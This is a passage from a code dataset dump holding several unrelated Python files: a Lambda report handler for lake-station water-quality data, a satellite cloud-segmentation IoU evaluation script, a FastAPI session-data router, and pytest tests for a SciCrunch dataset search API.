pymysql.connect(rds_dbhost, user=rds_dbuser, passwd=rds_dbpwd, db=rds_dbname, connect_timeout=5)\n\n\ndef handler(event,context):\n \n #Establish DB Cursor\n tercdbcr = tercdbcon.cursor()\n\n #Report Dict\n nsStatReport = []\n\n if(event['id'] and event['id'].isdigit() and event['rptdate'] and event['rptdate'].isdigit() and len(event['rptdate']) == 8):\n\n #Var for Stored Procedure Command\n sp_cmd = \"\"\n\n #Var for Parse Report Date\n tmp_rpt_date = str(event['rptdate'])\n\n #Var for Report Date \n sp_rpt_date = tmp_rpt_date[:4] + \"-\" + tmp_rpt_date[4:-2] + \"-\" + tmp_rpt_date[-2:]\n\n #Var for Station Name\n terc_station = \"\"\n\n\n #Var for numeric of submitted cid value\n n_stationid = int(event['id'])\n \n if(n_stationid == 1):\n sp_cmd = \"CALL sp_report_ns_station_range_cascade('\"\n terc_station = \"Cascade\" \n \n if(n_stationid == 2):\n sp_cmd = \"CALL sp_report_ns_station_range_dollarpoint('\"\n terc_station = \"Dollar Point\"\n \n if(n_stationid == 3):\n sp_cmd = \"CALL sp_report_ns_station_range_glenbrook('\"\n terc_station = \"Glenbrook\"\n \n if(n_stationid == 4):\n sp_cmd = \"CALL sp_report_ns_station_range_homewood('\"\n terc_station = \"Homewood\"\n \n if(n_stationid == 5):\n sp_cmd = \"CALL sp_report_ns_station_range_meeks('\"\n terc_station = \"Meeks\"\n \n if(n_stationid == 6):\n sp_cmd = \"CALL sp_report_ns_station_range_rubicon('\"\n terc_station = \"Rubicon\"\n \n if(n_stationid == 7):\n sp_cmd = \"CALL sp_report_ns_station_range_sandharbor('\"\n terc_station = \"Sand Harbor\"\n \n if(n_stationid == 8):\n sp_cmd = \"CALL sp_report_ns_station_range_tahoevista('\"\n terc_station = \"Tahoe Vista\"\n \n if(n_stationid == 9):\n sp_cmd = \"CALL sp_report_ns_station_range_tahoecity('\"\n terc_station = \"Tahoe City\"\n\n if(n_stationid == 10):\n sp_cmd = \"CALL sp_report_ns_station_range_camprichardson('\"\n terc_station = \"Camp Richardson\"\n \n if(n_stationid == 11):\n sp_cmd = \"CALL sp_report_ns_station_range_timbercove('\"\n terc_station = \"Timber Cove\"\n\n \n if(len(sp_cmd) > 1):\n \n sp_cmd += sp_rpt_date + \" 00:00:00','\" + sp_rpt_date + \" 23:59:59')\" \n\n #Call SP for Reporting\n tercdbcr.execute(sp_cmd) \n tercdbcon.commit()\n tdb_rslt = tercdbcr.fetchall()\n\n #Set Last Sync Date\n for rptEntry in tdb_rslt:\n\n nssData = {'ID':'',\n 'Station_Name':'',\n 'TmStamp':'',\n 'LS_Chlorophyll_Avg':'',\n 'LS_Temp_Avg':'',\n 'LS_Turbidity_Avg':'',\n 'WaveHeight':''}\n\n \n nssData['ID'] = event['id']\n nssData['Station_Name'] = terc_station\n nssData['TmStamp'] = rptEntry[0].strftime('%Y-%m-%d %H:%M:%S')\n nssData['LS_Chlorophyll_Avg'] = str(rptEntry[1])\n nssData['LS_Temp_Avg'] = str(rptEntry[2])\n nssData['LS_Turbidity_Avg'] = str(rptEntry[3])\n nssData['WaveHeight'] = str(rptEntry[4])\n \n #Add to Report\n nsStatReport.append(nssData)\n\n\n\n \n\n\n #Close Out Cursor and Connection\n tercdbcr.close()\n #tercdbcon.close()\n\n\n return nsStatReport\n\n\n", "sub_path": "Python_Lambda/report-get-ns-system-bydate.py", "file_name": "report-get-ns-system-bydate.py", "file_ext": "py", "file_size_in_byte": 3957, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rds_config.db_host", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rds_config.db_name", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rds_config.db_username", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rds_config.db_password", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "132275371", "text": "# https://www.jeremyjordan.me/evaluating-image-segmentation-models/\n\nimport torch\nimport numpy as np\nfrom PIL import Image\nimport os\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--inp_type', type=str, help='tir/vis/fusion')\nparser.add_argument('--cf',type = str, help='1/13')\nparser.add_argument('--model_path',type=str,help='path to model')\nparser.add_argument('--device',type=str,default='cuda',help='path to model')\nparser.add_argument('--save_result',type=int,default='0',help='1/0')\n\n\n\nargs = parser.parse_args()\n\n# PyTroch version\n\nSMOOTH = 1e-6\n\ndef iou_pytorch(outputs: torch.Tensor, labels: torch.Tensor):\n # You can comment out this line if you are passing tensors of equal shape\n # But if you are passing output from UNet or something it will most probably\n # be with the BATCH x 1 x H x W shape\n outputs = outputs.squeeze(1) # BATCH x 1 x H x W => BATCH x H x W\n \n intersection = (outputs & labels).float().sum((1, 2)) # Will be zero if Truth=0 or Prediction=0\n union = (outputs | labels).float().sum((1, 2)) # Will be zzero if both are 0\n \n iou = (intersection + SMOOTH) / (union + SMOOTH) # We smooth our devision to avoid 0/0\n \n thresholded = torch.clamp(20 * (iou - 0.5), 0, 10).ceil() / 10 # This is equal to comparing with thresolds\n \n return thresholded # Or thresholded.mean() if you are interested in average across the batch\n \n \n# Numpy version\n# Well, it's the same function, so I'm going to omit the comments\n\ndef iou_numpy(outputs: np.array, labels: np.array):\n outputs = outputs.squeeze(1)\n \n intersection = (outputs & labels).sum((1, 2))\n union = (outputs | labels).sum((1, 2))\n \n iou = (intersection + SMOOTH) / (union + SMOOTH)\n \n thresholded = np.ceil(np.clip(20 * (iou - 0.5), 0, 10)) / 10\n \n return thresholded \n\n\ndef iou_npy(target,prediction):\n intersection = np.logical_and(target, prediction)\n union = np.logical_or(target, prediction)\n iou_score = np.sum(intersection) / np.sum(union)\n \n return iou_score\n\ndef precision( target, prediction ):\n intersection = np.logical_and( target,prediction )\n den = prediction\n prec = np.sum( intersection ) / np.sum( den )\n return prec\n \n \ndef recall( target, prediction ):\n intersection = np.logical_and( target, prediction )\n den = target\n recall = np.sum( intersection ) / np.sum( den )\n return recall\n\n\n\nif __name__ == '__main__':\n arg = args.inp_type\n cloud_flag = args.cf\n device = args.device\n \n test_index = [0,4,8,12,16]\n iou, prec, rec = [], [], []\n man_iou,man_p,man_r = [],[],[]\n if arg == 'vis': \n files = os.listdir(\"./INSAT3D_VIS_India\")\n files.sort()\n files = files[8:25]\n test_list = [ files[i] for i in test_index ] \n elif arg == 'tir':\n files = os.listdir(\"./INSAT3D_TIR1_India\")\n files.sort()\n files = files[8:25]\n test_list = [ files[i] for i in test_index ]\n elif arg == 'fusion':\n files1 = os.listdir(\"./INSAT3D_VIS_India\")\n files1.sort()\n files1 = files1[8:25]\n test_list1 = [ files1[i] for i in test_index ]\n\n files2 = os.listdir(\"./INSAT3D_TIR1_India\")\n files2.sort()\n files2 = files2[8:25]\n test_list2 = [ files2[i] for i in test_index ]\n\n test_list = [ (test_list1[i], test_list2[i]) for i in range(5) ]\n\n\n #device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n \n model = torch.load(args.model_path,map_location=device)\n model = model.eval()\n label_list = [f'./../SIH/INSAT_Cloud_Labels/CROPPED_TIFF/CMK_Cropped_{i}.tif' for i in [9,13,17,21,25]]\n \n for ind,img_name in enumerate(test_list):\n if arg != 'fusion':\n if arg == 'vis':\n image = np.array(Image.open(f'./INSAT3D_VIS_India/{img_name}'))[:,:1072] \n elif arg == 'tir':\n image = np.array(Image.open(f'./INSAT3D_TIR1_India/{img_name}'))[:,:1072] \n elif arg == 'fusion':\n\n image1 = np.array(Image.open(f'./INSAT3D_VIS_India/{img_name[0]}'))[:,:1072]\n image1 = image1.astype(np.float)\n\n image2 = np.array(Image.open(f'./INSAT3D_TIR1_India/{img_name[1]}'))[:,:1072]\n image2 = image2.astype(np.float)\n\n image = np.array([image1,image2])\n image = image.astype(np.float)\n #image = image.transpose( (1,2,0))\n\n img_tensor = torch.from_numpy(image)\n #print(img_tensor.shape)\n\n if arg == 'fusion':\n img_tensor = img_tensor.view((1,2,984,1072))\n else:\n img_tensor = img_tensor.view((1,1,984,1072))\n\n\n img_tensor = img_tensor.to(device,dtype=torch.float)\n \n with torch.no_grad():\n out = model(img_tensor)\n output = out.cpu().detach().numpy()\n output = np.squeeze(output)\n output = output > 0\n output = output.astype(float)\n \n \n \n label = np.array(Image.open(label_list[ind]))[:,:1072]\n if cloud_flag == '13':\n label = np.logical_or( label ==1, label ==3 )\n elif cloud_flag == '1' :\n label = label == 1\n \n target = label.astype(np.float)\n \n if args.inp_type == 'vis':\n man_lst,man_prec, man_rec = [], [], []\n for thresh in [0,50,100,200]:\n man_op = image > thresh\n man_op = man_op.astype(np.float)\n man_lst.append(iou_npy(target,man_op))\n man_prec.append( precision(target,man_op) )\n man_rec.append( recall(target,man_op) )\n man_iou.append(man_lst)\n man_p.append(man_prec)\n man_r.append(man_rec) \n \n if args.inp_type == 'tir': \n man_lst,man_prec, man_rec = [], [], []\n for thresh in [600,650,700,750,800,850,900]:\n man_op = image < thresh\n man_op = man_op.astype(np.float)\n man_lst.append(iou_npy(target,man_op))\n man_prec.append( precision(target,man_op) )\n man_rec.append( recall(target,man_op) )\n man_iou.append(man_lst)\n man_p.append(man_prec)\n man_r.append(man_rec) \n \n \n if args.save_result:\n save_dir = f'results_{args.model_path[2:]}'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n save_img = Image.fromarray(output*255)\n save_name = f'{save_dir}/{ind}.tif'\n print(save_name)\n save_img.save(save_name)\n iou.append(iou_npy(target,output))\n prec.append( precision(target,output) )\n rec.append( recall( target,output ) )\n\n \n iou = np.array(iou)\n prec = np.array(prec)\n rec = np.array( rec )\n man_iou =np.array(man_iou)\n man_p = np.array(man_p)\n man_r = np.array(man_r)\n print(np.mean(man_iou,axis=0) )\n print(\"precision \", np.mean(man_p,axis=0))\n print( \" recall \", np.mean(man_r,axis=0) )\n print(iou)\n print(np.mean(iou), np.mean(prec), np.mean(rec))\n\n \n\n\n \n\n\n'''\nlabel = np.array(Image.open(f'./../SIH/INSAT_Cloud_Labels/CROPPED_TIFF/CMK_Cropped_13.tif'))[:,:1072]\nlabel = np.logical_or( label==1, label==3 )\ntarget = label.astype(np.float)\nlabel = label.astype(np.bool)\nlabel = np.reshape(label, (1,label.shape[0],label.shape[1]))\nprint(target)\n\nimg = np.array(Image.open(f'./INSAT3D_VIS_India/3DIMG_07NOV2019_0600_L1C_SGP_vis.tif'))[:,:1072] \n \n \npred = np.array(Image.open('./out_vis_6000.tif'),dtype=np.bool)\npred = np.reshape(pred,(1,pred.shape[0],pred.shape[1])) \nprediction = np.array(Image.open('./out_vis_6000.tif'),dtype=np.float)\nprediction = prediction > 0\nprediction = prediction.astype(float)\nprint(prediction)\n\nprint(img)\n#print(prediction)\n#prediction = np.ones((label.shape[1],label.shape[2]))\n#print(np.sum(prediction-pred))\n\nprint(label.shape,pred.shape)\nprint( iou_npy( target, prediction ) )\n\nfor i in range(0,250,10):\n manual_prediction = img >i\n manual_prediction = manual_prediction.astype(np.float)\n print(i, iou_npy(target,manual_prediction))\nmanual_prediction = img>85\nprint(\"85\", iou_npy(target,manual_prediction))\n\n\n\n#iou, thresholded = iou_numpy(prediction.astype(bool),label)\n\n\nprint(f' iou_score - {iou_score}')\n#print(iou, thresholded)\n'''\n ", "sub_path": "unet/pytorch-unet/calc_iou.py", "file_name": "calc_iou.py", "file_ext": "py", "file_size_in_byte": 8509, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.clamp", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.ceil", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 74, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 98, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 120, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 122, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 125, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 132, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 155, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 155, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.logical_or", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 191, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 192, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "399349143", "text": "import logging\nfrom typing import List\n\nfrom fastapi import APIRouter, BackgroundTasks, Depends\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nfrom starlette.status import HTTP_200_OK\n\nfrom cme import database, utils, controller\nfrom cme.api import error\n\nrouter = APIRouter()\nsecurity = HTTPBasic()\n\n\n# for group 1 to give information about new protocols\n@router.post(\"/\", status_code=HTTP_200_OK, tags=[])\nasync def post_new_ids(ids: List[str], background_tasks: BackgroundTasks,\n credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n # create subprocess: background task to get new protocols and iterate over (start parser/cme)\n logging.info(f\"Received update request for sessions '{ids}'\")\n background_tasks.add_task(controller.evaluate_newest_sessions, ids)\n\n return {\"details: \": f\"Background task has been created to evaluate newest sessions with ids: '{ids}'\"}\n\n\n@router.get(\"/session/{session_id}\", status_code=HTTP_200_OK, tags=['data'])\nasync def get_session(session_id: int, credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n # id = legislative period + session eg: 19177\n session = database.find_one(\"session\", {'session_id': session_id})\n\n if not session:\n error.raise_404(f\"No session with id '{session_id}' was found.\")\n del session['_id']\n return session\n\n\n@router.get(\"/sessions/\", status_code=HTTP_200_OK, tags=['data'])\nasync def get_session_ids(credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n session_ids = database.find_all_ids('session', 'session_id')\n session_ids.sort()\n return session_ids\n\n\n@router.get(\"/period/{legislative_period}\", status_code=HTTP_200_OK, tags=['data'])\nasync def get_all_sessions_in_legislative_period(legislative_period: int,\n credentials: HTTPBasicCredentials = Depends(security)):\n utils.get_basic_auth_client(credentials)\n\n sessions = database.find_many(\"session\", {'legislative_period': legislative_period})\n if not sessions:\n error.raise_404(f\"No sessions found for legislative period '{legislative_period}'.\")\n\n for session in sessions:\n del session['_id']\n return sessions\n", "sub_path": "cme/api/api_session.py", "file_name": "api_session.py", "file_ext": "py", "file_size_in_byte": 2341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fastapi.APIRouter", "line_number": 11, "usage_type": "call"}, {"api_name": "fastapi.security.HTTPBasic", "line_number": 12, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "fastapi.BackgroundTasks", "line_number": 17, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 18, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 19, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 22, "usage_type": "call"}, {"api_name": "cme.controller.evaluate_newest_sessions", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cme.controller", "line_number": 23, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 16, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 29, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 30, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 30, "usage_type": "name"}, {"api_name": "cme.database.find_one", "line_number": 33, "usage_type": "call"}, {"api_name": "cme.database", "line_number": 33, "usage_type": "name"}, {"api_name": "cme.api.error.raise_404", "line_number": 36, "usage_type": "call"}, {"api_name": "cme.api.error", "line_number": 36, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 28, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 42, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 42, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 43, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 43, "usage_type": "name"}, {"api_name": "cme.database.find_all_ids", "line_number": 45, "usage_type": "call"}, {"api_name": "cme.database", "line_number": 45, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 41, "usage_type": "name"}, {"api_name": "fastapi.security.HTTPBasicCredentials", "line_number": 52, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 52, "usage_type": "call"}, {"api_name": "cme.utils.get_basic_auth_client", "line_number": 53, "usage_type": "call"}, {"api_name": "cme.utils", "line_number": 53, "usage_type": "name"}, {"api_name": "cme.database.find_many", "line_number": 55, "usage_type": "call"}, {"api_name": "cme.database", "line_number": 55, "usage_type": "name"}, {"api_name": "cme.api.error.raise_404", "line_number": 57, "usage_type": "call"}, {"api_name": "cme.api.error", "line_number": 57, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "309667366", "text": "import json\nimport pytest\nfrom packaging import version\n\nfrom app import app\nfrom app.main import dataset_search\nfrom app.scicrunch_requests import create_query_string\n\nfrom known_uberons import UBERONS_DICT\nfrom known_dois import has_doi_changed, warn_doi_changes\n\n\n@pytest.fixture\ndef client():\n # Spin up test flask app\n app.config['TESTING'] = True\n return app.test_client()\n\n\ndef test_scicrunch_keys(client):\n r = client.get('/search/')\n assert r.status_code == 200\n assert 'numberOfHits' in json.loads(r.data).keys()\n\n\ndef check_doi_status(client, dataset_id, doi):\n r = client.get('/dataset_info/using_pennsieve_identifier', query_string={'identifier': dataset_id})\n response = json.loads(r.data)\n result = response['result'][0]\n status = True\n if version.parse(result['version']) >= version.parse(\"1.1.4\"):\n if has_doi_changed(result['doi'].replace('https://doi.org/', ''), doi):\n warn_doi_changes()\n status = False\n\n return status\n\n\ndef test_scicrunch_dataset_doi(client):\n # Testing with dataset 55\n identifier = \"55\"\n run_doi_test = check_doi_status(client, identifier, '10.26275/pzek-91wx')\n\n if run_doi_test:\n r = client.get('/scicrunch-dataset/DOI%3A10.26275%2Fpzek-91wx')\n dataset_version = json.loads(r.data)['hits']['hits'][0]['_source']['item']['version']['keyword']\n if version.parse(dataset_version) >= version.parse(\"1.1.4\"):\n assert json.loads(r.data)['hits']['hits'][0]['_id'] == \"55\"\n assert json.loads(r.data)['hits']['hits'][0]['_source']['item']['curie'] == \"DOI:10.26275/pzek-91wx\"\n else:\n assert json.loads(r.data)['hits']['hits'][0]['_id'] == \"DOI:10.26275/pzek-91wx\"\n else:\n pytest.skip('DOI used in test is out of date.')\n\ndef test_scicrunch_multiple_dataset_doi(client):\n # Testing with dataset 55 and 68\n run_doi_test_1 = check_doi_status(client, \"55\", '10.26275/pzek-91wx')\n run_doi_test_2 = check_doi_status(client, \"68\", '10.26275/4qvr-kwzq')\n\n if run_doi_test_1 and run_doi_test_2:\n r = client.get('/dataset_info/using_multiple_dois/?dois=10.26275%2Fpzek-91wx&dois=10.26275%2F4qvr-kwzq')\n results = json.loads(r.data)['results']\n dataset_version = results[0]['version']\n if version.parse(dataset_version) >= version.parse(\"1.1.4\"):\n discover_id_1 = results[0]['dataset_identifier']\n discover_id_2 = results[1]['dataset_identifier']\n assert discover_id_1 == \"55\" or discover_id_1 == \"68\"\n assert discover_id_2 == \"55\" or discover_id_2 == \"68\"\n else:\n pytest.skip('DOI used in test is out of date.')\n\ndef test_scicrunch_multiple_dataset_ids(client):\n # Testing with dataset 55 and 68\n r = client.get('/dataset_info/using_multiple_discoverIds/?discoverIds=55&discoverIds=68')\n results = json.loads(r.data)['results']\n dataset_version = results[0]['version']\n if version.parse(dataset_version) >= version.parse(\"1.1.4\"):\n discover_id_1 = results[0]['dataset_identifier']\n discover_id_2 = results[1]['dataset_identifier']\n assert discover_id_1 == \"55\" or discover_id_1 == \"68\"\n assert discover_id_2 == \"55\" or discover_id_2 == \"68\"\n\ndef test_scicrunch_search(client):\n r = client.get('/search/heart')\n assert r.status_code == 200\n assert json.loads(r.data)['numberOfHits'] > 4\n\n\ndef test_scicrunch_all_data(client):\n r = client.get('/filter-search/')\n assert json.loads(r.data)['numberOfHits'] > 40\n\n\ndef test_scicrunch_filter(client):\n r = client.get('/filter-search/', query_string={'term': 'organ', 'facet': 'heart'})\n assert json.loads(r.data)['numberOfHits'] > 4\n\n\ndef test_scicrunch_filter_scaffolds(client):\n r = client.get('/filter-search/?facet=scaffolds&term=datasets')\n assert json.loads(r.data)['numberOfHits'] > 10\n\n\ndef test_scicrunch_filter_simulations(client):\n r = client.get('/filter-search/?facet=simulations&term=datasets')\n assert json.loads(r.data)['numberOfHits'] > 0\n\n\ndef test_scicrunch_basic_search(client):\n r = client.get('/filter-search/Heart/?facet=All+Species&term=species')\n assert json.loads(r.data)['numberOfHits'] > 10\n\n\ndef test_scicrunch_boolean_logic(client):\n r = client.get('/filter-search/?facet=All+Species&term=species&facet=male&term=gender&facet=female&term=gender')\n assert json.loads(r.data)['numberOfHits'] > 20\n\n\ndef test_scicrunch_combined_facet_text(client):\n r = client.get('/filter-search/heart/?facet=All+Species&term=species&facet=male&term=gender&facet=female&term=gender')\n assert json.loads(r.data)['numberOfHits'] > 1\n\n\ndef test_getting_facets(client):\n r = client.get('/get-facets/organ')\n facet_results = json.loads(r.data)\n facets = [facet_result['key'] for facet_result in facet_results]\n assert 'heart' in facets\n\n\ndef test_create_identifier_query(client):\n r = client.get('/dataset_info/using_object_identifier?identifier=package:e6435710-dd9c-46b7-9dfd-932103469733')\n\n json_data = json.loads(r.data)\n assert 'result' in json_data\n\n results = json_data['result']\n assert len(results) == 1\n\n result = results[0]\n assert 'version' in result\n assert result['version'] == '1.1.3'\n\n assert 'title' in result\n assert result['title'] == 'Morphometric analysis of the abdominal vagus nerve in rats'\n\n\ndef test_response_version(client):\n # Testing with dataset 44\n identifier = \"44\"\n doi = \"10.26275/duz8-mq3n\"\n run_doi_test = check_doi_status(client, identifier, doi)\n if run_doi_test:\n r = client.get('/dataset_info/using_doi', query_string={'doi': doi})\n data = r.data.decode('utf-8')\n json_data = json.loads(data)\n assert len(json_data['result']) == 1\n assert 'version' in json_data['result'][0]\n else:\n pytest.skip('DOI used in test is out of date.')\n\n\ndef test_response_abi_plot(client):\n # Testing abi-plot with dataset 141\n identifier = \"141\"\n doi = \"10.26275/9qws-u3px\"\n run_doi_test = check_doi_status(client, identifier, doi)\n if run_doi_test:\n r = client.get('/dataset_info/using_doi', query_string={'doi': doi})\n data = r.data.decode('utf-8')\n json_data = json.loads(data)\n assert len(json_data['result']) == 1\n if json_data['result'][0]['version'] == '1.1.5':\n assert len(json_data['result'][0]['abi-plot']) == 5\n identifier = json_data['result'][0][\"dataset_identifier\"]\n version = json_data['result'][0][\"dataset_version\"]\n assert identifier == \"141\"\n assert version == \"3\"\n # Construct the file path prefix, it should be /exists/141/3/files\n path_prefix = '/'.join(('', 'exists', identifier, version, 'files'))\n for plot in json_data['result'][0]['abi-plot']:\n for path in plot['datacite']['isDescribedBy']['path']:\n if path:\n path = '/'.join((path_prefix, path))\n # Check if the file exists using the /exists/{path} route\n r2 = client.get(path)\n data2 = r2.data.decode('utf-8')\n json_data2 = json.loads(data2)\n print(path)\n assert json_data2['exists'] == 'true'\n else:\n pytest.skip('Only test abi-plot against version 1.1.5.')\n else:\n pytest.skip('DOI used in test is out of date.')\n\n\ndef test_response_abi_scaffold(client):\n # Testing abi-scaffold with dataset 76\n identifier = \"76\"\n doi = \"10.26275/jarb-s8jw\"\n run_doi_test = check_doi_status(client, identifier, doi)\n if run_doi_test:\n r = client.get('/dataset_info/using_doi', query_string={'doi': doi})\n data = r.data.decode('utf-8')\n json_data = json.loads(data)\n if len(json_data['result']) == 1:\n if json_data['result'][0]['version'] == '1.1.5':\n identifier = json_data['result'][0][\"dataset_identifier\"]\n dataset_version = json_data['result'][0][\"dataset_version\"]\n assert identifier == \"76\"\n assert dataset_version == \"4\"\n # Construct the file path prefix, it should be /exists/76/4/files\n path_prefix = '/'.join(('', 'exists', identifier, dataset_version, 'files'))\n assert len(json_data['result'][0]['abi-scaffold-metadata-file']) == 1\n for plot in json_data['result'][0]['abi-scaffold-metadata-file']:\n for path in plot['datacite']['isSourceOf']['path']:\n if path:\n path = '/'.join((path_prefix, path))\n # Check if the file exists using the /exists/{path} route\n r2 = client.get(path)\n data2 = r2.data.decode('utf-8')\n json_data2 = json.loads(data2)\n print(path)\n assert json_data2['exists'] == 'true'\n\n assert len(json_data['result'][0]['abi-scaffold-view-file']) == 4\n for plot in json_data['result'][0]['abi-scaffold-view-file']:\n for path in plot['datacite']['isSourceOf']['path']:\n if path:\n path = '/'.join((path_prefix, path))\n # Check if the file exists using the /exists/{path} route\n r2 = client.get(path)\n data2 = r2.data.decode('utf-8')\n json_data2 = json.loads(data2)\n print(path)\n assert json_data2['exists'] == 'true'\n\n assert len(json_data['result'][0]['abi-scaffold-thumbnail']) == 4 \n for plot in json_data['result'][0]['abi-scaffold-thumbnail']:\n for path in plot['datacite']['isDerivedFrom']['path']:\n if path:\n path = '/'.join((path_prefix, path))\n # Check if the file exists using the /exists/{path} route\n r2 = client.get(path)\n data2 = r2.data.decode('utf-8')\n json_data2 = json.loads(data2)\n print(path)\n assert json_data2['exists'] == 'true'\n else:\n pytest.skip('Only test abi-plot against version 1.1.5.')\n else:\n pytest.skip('DOI used in test is out of date.')\n\n\ndef test_response_sample_subject_size(client):\n # Only filter search returns the sample and subjectSuze\n r = client.get('/filter-search/?facet=pig&term=species&facet=urinary+bladder&term=organ')\n data = r.data.decode('utf-8')\n json_data = json.loads(data)\n print(json_data)\n assert len(json_data['results']) == 1\n assert json_data['results'][0]['sampleSize'] == '509'\n assert json_data['results'][0]['subjectSize'] == '8'\n\n\nsource_structure = {\n 'type': dict,\n 'required': ['contributors', 'dataItem', 'dates', 'distributions',\n {'item':\n {\n 'type': dict,\n 'required': [{'version': {'type': dict, 'required': ['keyword'], 'optional': []}}, 'types', 'contentTypes', 'names', 'statistics', 'keywords', 'published',\n 'description',\n 'name', 'readme', 'identifier', 'docid', 'curie'],\n 'optional': ['techniques', 'modalities']\n }}, 'pennsieve', 'provenance', 'supportingAwards'],\n 'optional': ['anatomy', 'attributes', 